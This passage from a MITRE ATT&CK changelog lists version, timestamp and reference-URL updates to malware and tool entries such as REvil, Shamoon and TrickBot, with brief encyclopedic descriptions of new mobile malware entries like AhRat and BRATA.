modified: 2023-03-26 19:54:58.293000+00:00 → 2024-04-11 00:21:49.455000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0496] REvil

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 20:06:33.317000+00:00 → 2024-04-11 00:15:32.724000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2

[S0565] Raindrop

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-27 19:53:24.461000+00:00 → 2024-04-11 00:23:21.599000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0629] RainyDay

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-08-19 19:14:14.922000+00:00 → 2024-04-11 00:22:35.591000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S1040] Rclone

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-04-13 13:14:41.257000+00:00 → 2024-04-04 03:50:32.975000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0172] Reaver

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-02-09 15:02:42.727000+00:00 → 2024-04-11 00:21:09.543000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0153] RedLeaves

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-23 15:14:18.594000+00:00 → 2024-04-11 00:17:52.256000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0375] Remexi

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:04:25.880000+00:00 → 2024-04-11 00:17:12.008000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0125] Remsec

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-28 20:28:28.088000+00:00 → 2024-04-11 00:16:18.864000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0433] Rifdoor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-05-08 00:24:24.402000+00:00 → 2024-04-11 00:14:59.199000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0448] Rising Sun

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-13 15:46:29.677000+00:00 → 2024-04-11 00:14:23.264000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 2.0 → 2.1

[S1037] STARWHALE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-14 15:23:17.961000+00:00 → 2024-04-11 00:01:29.506000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0559] SUNBURST

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-27 20:01:39.552000+00:00 → 2023-12-26 19:44:49.643000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.4 → 2.5

[S0578] SUPERNOVA

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-04-23 23:00:41.648000+00:00 → 2024-04-10 23:45:34.261000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0074] Sakula

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:13:29.169000+00:00 → 2024-04-11 00:10:10.398000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0370] SamSam

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2019-04-18 20:59:56.853000+00:00 → 2024-04-11 00:09:42.414000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0345] Seasalt

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-19 19:18:10.963000+00:00 → 2024-04-11 00:08:51.818000+00:00
external_references[2]['url']: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip → https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0140] Shamoon

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

New Description
[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. Analysis has linked [Shamoon](https://attack.mitre.org/software/S0140) with [Kwampirs](https://attack.mitre.org/software/S0236) based on multiple shared artifacts and coding patterns.(Citation: Cylera Kwampirs 2022) The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-02-09 13:42:15.121000+00:00 → 2024-02-08 20:53:17.332000+00:00
description: [Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016) → [Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. Analysis has linked [Shamoon](https://attack.mitre.org/software/S0140) with [Kwampirs](https://attack.mitre.org/software/S0236) based on multiple shared artifacts and coding patterns.(Citation: Cylera Kwampirs 2022) The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2
iterable_item_added
STIX Field: Old value → New Value
external_references: (empty) → {'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[S1019] Shark

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-08-31 21:47:57.382000+00:00 → 2024-04-11 00:08:18.570000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0007] Skeleton Key

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-18 16:17:41.437000+00:00 → 2024-02-06 19:02:00.781000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0468] Skidmap

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-06-26 04:03:50.568000+00:00 → 2024-04-11 00:06:31.222000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0633] Sliver

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-01-17 22:14:02.852000+00:00 → 2024-04-11 00:06:01.264000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0226] Smoke Loader

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-28 21:43:37.366000+00:00 → 2024-04-11 00:04:55.094000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0374] SpeakUp

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-29 16:41:33.128000+00:00 → 2024-04-11 00:02:59.341000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S1030] Squirrelwaffle

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-08-26 21:08:39.890000+00:00 → 2024-04-11 00:02:15.805000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0380] StoneDrill

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:15:28.897000+00:00 → 2024-04-11 00:00:54.356000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0491] StrongPity

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-10-15 02:00:29.185000+00:00 → 2024-04-10 23:47:16.416000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0603] Stuxnet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 13:50:55.168000+00:00 → 2024-04-10 23:46:32.577000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[S0663] SysUpdate

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 16:32:21.733000+00:00 → 2024-04-10 23:44:19.752000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0131] TINYTYPHON

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_aliases: (empty) → ['TINYTYPHON']
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2018-10-17 00:14:20.652000+00:00 → 2024-04-10 22:32:05.321000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0263] TYPEFRAME

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 20:22:31.288000+00:00 → 2024-04-10 22:26:03.638000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0011] Taidoor

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-15 12:34:22.853000+00:00 → 2024-04-10 22:36:03.362000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 2.0 → 2.1

[S0057] Tasklist

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-12 21:30:23.536000+00:00 → 2024-02-12 19:14:37.984000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0665] ThreatNeedle

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 20:18:23.760000+00:00 → 2024-04-10 22:32:30.915000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0678] Torisma

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-21 11:45:38.621000+00:00 → 2024-04-10 22:31:28.094000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0266] TrickBot

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-08-09 16:44:56.511000+00:00 → 2024-04-10 22:28:21.746000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2

[S0333] UBoatRAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:24:01.572000+00:00 → 2024-04-10 22:22:03.759000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0136] USBStealer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-19 22:53:27.639000+00:00 → 2024-04-10 22:17:40.838000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0022] Uroburos

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-10-02 17:26:25.052000+00:00 → 2024-04-10 22:18:48.304000+00:00
x_mitre_version: 2.0 → 2.1

[S0386] Ursnif

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-22 05:42:32.541000+00:00 → 2024-04-10 22:18:21.527000+00:00
external_references[5]['url']: https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992 → https://web.archive.org/web/20210719165945/https://www.trendmicro.com/en_us/research/15/c/ursnif-the-multifaceted-malware.html?_ga=2.165628854.808042651.1508120821-744063452.1505819992
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.4 → 1.5

[S0257] VERMIN

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:26:04.840000+00:00 → 2024-04-10 22:17:02.480000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0180] Volgmer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-26 20:40:35.183000+00:00 → 2024-04-10 22:16:05.440000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0612] WastedLocker

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-09-27 17:36:37.593000+00:00 → 2024-03-25 19:46:59.150000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0579] Waterbear

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2022-03-25 16:46:35.932000+00:00 → 2024-04-10 22:14:28.440000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0689] WhisperGate

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-04-05 20:48:07.280000+00:00 → 2024-04-10 22:13:49.349000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0466] WindTail

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-20 22:03:11.833000+00:00 → 2024-04-10 20:39:43.747000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0430] Winnti for Linux

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-07-01 18:34:02.367000+00:00 → 2024-04-10 20:36:12.150000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0141] Winnti for Windows

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 22:02:53.982000+00:00 → 2024-04-10 20:35:29.262000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 3.0 → 3.1

[S1065] Woody RAT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-04-17 14:58:02.400000+00:00 → 2024-04-10 20:34:14.166000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0388] YAHOYAH

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_removed
STIX Field: Old value → New Value
x_mitre_contributors: ['Bart Parys'] → (empty)
values_changed
STIX Field: Old value → New Value
modified: 2023-03-23 15:24:22.256000+00:00 → 2024-04-19 13:19:32.736000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0230] ZeroT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-30 18:31:33.197000+00:00 → 2024-04-10 20:32:14.510000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[S0330] Zeus Panda

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-22 05:47:42.436000+00:00 → 2024-04-10 20:31:00.234000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[S0672] Zox

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 22:03:44.670000+00:00 → 2024-04-10 20:30:02.520000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S1013] ZxxZ

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_aliases: (empty) → ['ZxxZ']
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 12:27:58.811000+00:00 → 2024-04-10 20:29:50.729000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0032] gh0st RAT

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-03-20 22:03:44.666000+00:00 → 2024-02-06 19:00:45.557000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 3.1 → 3.2

[S1059] metaMain

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-04-05 14:09:42.670000+00:00 → 2024-04-11 00:45:31.029000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1

[S0104] netstat

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-07-25 19:25:05.678000+00:00 → 2024-01-23 19:57:39.135000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3

[S0385] njRAT

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-09-20 20:03:22.206000+00:00 → 2024-04-11 00:33:37.539000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6

Patches

[S0604] Industroyer

Current version: 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-10-17 20:09:38.062000+00:00 → 2024-04-11 16:06:34.700000+00:00
x_mitre_contributors[0]: Dragos Threat Intelligence → Dragos Threat Intelligence

[S0276] Keydnap

Current version: 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-17 14:35:31.022000+00:00 → 2024-01-10 15:18:40.400000+00:00
external_references[4]['url']: https://www.synack.com/2017/01/01/mac-malware-2016/ → https://objective-see.org/blog/blog_0x16.html
x_mitre_attack_spec_version: 2.1.0 → 3.2.0

[S0109] WEBC2

Current version: 2.0

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2020-08-25 21:23:24.223000+00:00 → 2023-12-26 19:55:54.848000+00:00
external_references[2]['url']: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip → https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version: 2.1.0 → 3.2.0

mobile-attack

New Software

[S1095] AhRat

Current version: 1.0

Description: [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder”, which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523)


[S1094] BRATA

Current version: 1.0

Description: [BRATA](https://attack.mitre.org/software/S1094) (Brazilian Remote Access Tool, Android), is an evolving Android malware strain, detected in late 2018 and again in late 2021. Originating in Brazil, [BRATA](https://attack.mitre.org/software/S1094) was later also found in the UK, Poland, Italy, Spain, and USA, where it is believed to have targeted financial institutions such as banks. There are currently three known variants of [BRATA](https://attack.mitre.org/software/S1094).(Citation: securelist_brata_0819)(Citation: cleafy_brata_0122)(Citation: mcafee_brata_0421)


[S1103] FlixOnline

Current version: 1.0

Description: [FlixOnline](https://attack.mitre.org/software/S1103) is an Android malware, first detected in early 2021, believed to target users of WhatsApp. [FlixOnline](https://attack.mitre.org/software/S1103) primarily spreads via automatic replies to a device’s incoming WhatsApp messages.(Citation: checkpoint_flixonline_0421)


[S1128] HilalRAT

Current version: 1.0

Description: [HilalRAT](https://attack.mitre.org/software/S1128) is a remote access-capable Android malware, developed and used by [UNC788](https://attack.mitre.org/groups/G1029).(Citation: Meta Adversarial Threat Report 2022) [HilalRAT](https://attack.mitre.org/software/S1128) is capable of collecting data, such as device location, call logs, etc., and is capable of executing actions, such as activating a device's camera and microphone.(Citation: Meta Adversarial Threat Report 2022)


[S1126] Phenakite

Current version: 1.0

Description: [Phenakite](https://attack.mitre.org/software/S1126) is a mobile malware that is used by [APT-C-23](https://attack.mitre.org/groups/G1028) to target iOS devices. According to several reports, [Phenakite](https://attack.mitre.org/software/S1126) was developed to fill a tooling gap and to target those who owned iPhones instead of Windows desktops or Android phones.(Citation: sentinelone_israel_hamas_war)(Citation: fb_arid_viper)

Minor Version Changes

[S0292] AndroRAT

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)

New Description
[AndroRAT](https://attack.mitre.org/software/S0292) is an open-source remote access tool for Android devices. [AndroRAT](https://attack.mitre.org/software/S0292) is capable of collecting data, such as device location, call logs, etc., and is capable of executing actions, such as sending SMS messages and taking pictures.(Citation: Lookout-EnterpriseApps)(Citation: github_androrat)(Citation: Forcepoint BITTER Pakistan Oct 2016) It is originally available through the `The404Hacking` Github repository.(Citation: github_androrat)

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_aliases: (empty) → ['AndroRAT']
x_mitre_deprecated: (empty) → False
x_mitre_platforms: (empty) → ['Android']
external_references: (empty) → https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan
values_changed
STIX Field: Old value → New Value
modified: 2022-10-24 15:09:07.609000+00:00 → 2024-04-16 21:01:50.792000+00:00
description: [AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps) → [AndroRAT](https://attack.mitre.org/software/S0292) is an open-source remote access tool for Android devices. [AndroRAT](https://attack.mitre.org/software/S0292) is capable of collecting data, such as device location, call logs, etc., and is capable of executing actions, such as sending SMS messages and taking pictures.(Citation: Lookout-EnterpriseApps)(Citation: github_androrat)(Citation: Forcepoint BITTER Pakistan Oct 2016) It is originally available through the `The404Hacking` Github repository.(Citation: github_androrat)
external_references[1]['source_name']: AndroRAT → Forcepoint BITTER Pakistan Oct 2016
external_references[1]['description']: (Citation: Lookout-EnterpriseApps) → Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: Old value → New Value
external_references: (empty) → {'source_name': 'github_androrat', 'description': 'The404Hacking. (n.d.). AndroRAT. Retrieved April 8, 2024.', 'url': 'https://web.archive.org/web/20221013124327/https://github.com/The404Hacking/AndroRAT'}

[S0289] Pegasus for iOS

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

New Description
[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims.(Citation: Lookout-Pegasus)(Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_deprecated: (empty) → False
values_changed
STIX Field: Old value → New Value
modified: 2022-10-24 15:09:07.609000+00:00 → 2024-04-06 00:01:53.588000+00:00
